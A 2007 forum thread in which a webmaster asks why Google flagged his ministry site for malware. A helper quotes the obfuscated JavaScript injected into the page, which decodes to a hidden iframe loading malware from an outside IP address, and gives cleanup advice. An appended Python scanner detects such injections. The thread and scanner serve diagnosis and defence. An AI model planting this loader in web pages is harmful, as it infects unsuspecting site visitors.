Hello members,
I hope you guys can help with suggestions and/or your own experiences.
A couple of days ago we received an email from Google with the subject line "Malware notification regarding cyuministries.org".
The entire email reads like this:
Dear site owner or webmaster of cyuministries.org,
We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on
Google.com.
Below is an example URL on your site which can cause users to be
infected (space inserted to prevent accidental clicking in case your
mail client auto-links URLs):
http://www.cyuministries .org/
Here is a link to a sample warning page:
http://www.google.com/interstitial?url= … tries.org/
We strongly encourage you to investigate this immediately to protect
your visitors. Although some sites intentionally distribute malicious
software, in many cases the webmaster is unaware because:
1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious
advertiser
If your site was compromised, it's important to not only remove the
malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting
provider if you are unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites:
http://www.stopbadware.org/home/security
Once you've secured your site, you can request that the warning be
removed by visiting http://www.stopbadware.org/home/review and
requesting a review. StopBadware and Google will jointly investigate
and reply to you with our findings. If your site is no longer harmful
to users, we will remove the warning.
Now when we requested a review from stopbadware.org, this was our response:
Thank you for contacting StopBadware.org. We are currently
re-reviewing a number of websites via our appeals process, and we have added your
site to the bottom of that testing queue. If this is the first appeal
for your site, you can expect a reply from us within 10 business days.
Subsequent appeals may take significantly longer.
Answers to commonly asked questions from site owners who are being
filtered by Google can be found at:
http://stopbadware.org/home/faq#partnerfiltering.
The StopBadware Team
This is so ridiculous that it's almost funny. Well, my wife is laughing just because of the nature of the warning, but I am very irritated. Our Ministry has nothing to hide, no secret codes in our website, and cannot seem to get anywhere.
Share your knowledge please.
Rev Ron.
CYU
Member
From: Pell City, Alabama USA
Registered: 2004-11-17
Posts: 2084
Our Ministry has nothing to hide, no secret codes in our website
Oh yeah?
See the code that looks like this on your page?
Code:
<script language="javascript"> document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </script>
you need to remove it - it loads a virus on Internet Explorer
Last edited by Mutilated1 (2007-02-28 02:27:42)
TombOfTheMutilated.NET - Destroying The Minds of America's Youth Since 2001
Thanks so much for this. We removed it right away. Do you know what it is and how someone could have put it there? Do you know how we can protect ourselves from this issue in the future?
Any information would be very helpful.
God bless you for taking the time to answer.
Rev. Ron
Well, most likely your home computer that you made the page with has a virus and it infected FrontPage that you used to make the page, but once you've been hacked you can't assume that everything is OK on your server either.
What you need to do is start by getting an updated virus scanner if you don't already have one, and scanning your computer so that you know that it's clean. AVG antivirus is free and it detected the virus on your page right away.
Then download your infected pages and remove the offending JavaScript using something other than FrontPage, otherwise you're likely to just get infected all over again. FrontPage uses Internet Explorer's functionality for its HTML view, so if you view the page in FrontPage you're going to be right back where you started.
In the long term, why not throw FrontPage in the garbage can? It's more trouble than it's worth, which unfortunately you found out the hard way. Might as well stop using Internet Explorer while you're at it. That's how these infections occur. It took me a few minutes to find your problem since by not using Internet Explorer I was immune. Mozilla Firefox is the safest web browser around. No point in messing around with broken web browsers like Internet Explorer that get you infected with viruses.
Then also, you can't rule out that your webhost is compromised, so contact your webhosting company and let them know what's happened to you so they can check your webhosting machine out and make sure it's clean. Might also consider a different host, because once a box is compromised, if you don't own it you can't really honestly trust it.
But my suspicion is that your webhost has not been compromised, just your home PC that you're making the pages with.
Oh, and as to what it is... that JavaScript writes an iframe on your page, that iframe loads another iframe which in turn loads the virus. Here is some info about the virus it loads:
http://secunia.com/virus_information/10530/agent-av/
TombOfTheMutilated.NET - Destroying The Minds of America's Youth Since 2001
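A check for this pattern in downloaded pages, as an added example that is not part of the original thread: it finds `document.write(unescape('...'))` calls, decodes the argument without executing it, and reports any iframe inside, flagging 1x1 frames. The function names and the sample page (which uses the documentation address 192.0.2.10) are constructed for illustration.

```python
import re
from urllib.parse import unquote

# document.write( unescape( '...' ) ) with any spacing or quote style
INJECT_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
# attribute values may be double-quoted, single-quoted or bare (src= http://...)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def _tiny(value):
    """True for a width/height of 0 or 1, i.e. a frame the visitor cannot see."""
    try:
        return int(value) <= 1
    except (TypeError, ValueError):
        return False

def scan_html(html):
    """Return one finding per document.write(unescape(...)) call in html."""
    findings = []
    for m in INJECT_RE.finditer(html):
        # JavaScript unescape() maps %XX to a Latin-1 code point
        decoded = unquote(m.group(2), encoding="latin-1")
        iframes = []
        for tag in IFRAME_RE.finditer(decoded):
            attrs = {a.group(1).lower(): a.group(2) or a.group(3) or a.group(4) or ""
                     for a in ATTR_RE.finditer(tag.group(1))}
            hidden = _tiny(attrs.get("width")) and _tiny(attrs.get("height"))
            iframes.append((attrs.get("src"), hidden))
        findings.append({"offset": m.start(), "decoded": decoded, "iframes": iframes})
    return findings

def js_escape(text):
    """Percent-encode every character; used only to build the sample below."""
    return "".join("%%%02X" % b for b in text.encode("latin-1"))

# Constructed sample: same shape as the injected script, documentation address
SAMPLE_PAYLOAD = ('<iframe src= http://192.0.2.10/index.html frameborder="0" '
                  'width="1" height="1" scrolling="no" name=counter></iframe>')
SAMPLE_PAGE = ('<html><body><h1>Welcome</h1>\n<script language="javascript"> '
               "document.write( unescape( '" + js_escape(SAMPLE_PAYLOAD) +
               "' ) ); </script>\n</body></html>")

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print("offset", f["offset"], "->", f["decoded"])
        for src, hidden in f["iframes"]:
            print("  iframe src:", src, "(hidden 1x1)" if hidden else "")
```

Running `scan_html` over every page pulled down from the host shows which files still carry the injection before they are re-uploaded.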
Thank you for such detailed information. Let me sleep and then read this post again. It's a lot to swallow at 1:15 AM.
I really appreciate your time,
Blessings to you!
Rev. Ron
Member
From: DeLand Florida
Registered: 2007-01-17
Posts: 28
Hey Mut
You should also point out it may be time to move to some form of Linux for their page making. I have switched to Freespire; it looks pretty nice.
You would be very wise to do what Mut said.